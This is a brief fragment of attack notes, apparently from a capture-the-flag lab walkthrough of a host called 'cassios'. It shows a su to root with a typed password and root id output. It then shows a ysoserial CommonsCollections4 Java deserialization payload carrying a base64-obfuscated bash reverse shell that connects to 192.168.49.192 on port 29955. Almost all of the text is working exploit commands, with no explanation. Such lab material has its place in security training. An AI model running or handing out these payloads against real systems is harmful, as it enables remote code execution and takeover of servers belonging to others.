[+] Done
[samantha@cassios tmp]$ su
su
Password: 6a12f449790ed7be96d77aa4c7d9c1c1
id
uid=0(root) gid=0(root) groups=0(root)

payload.sh

./payload -r -e base64
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ5LjE5Mi8yOTk1NSAwPiYxCg==}|{base64,-d}|{bash,-i}" > recycler.ser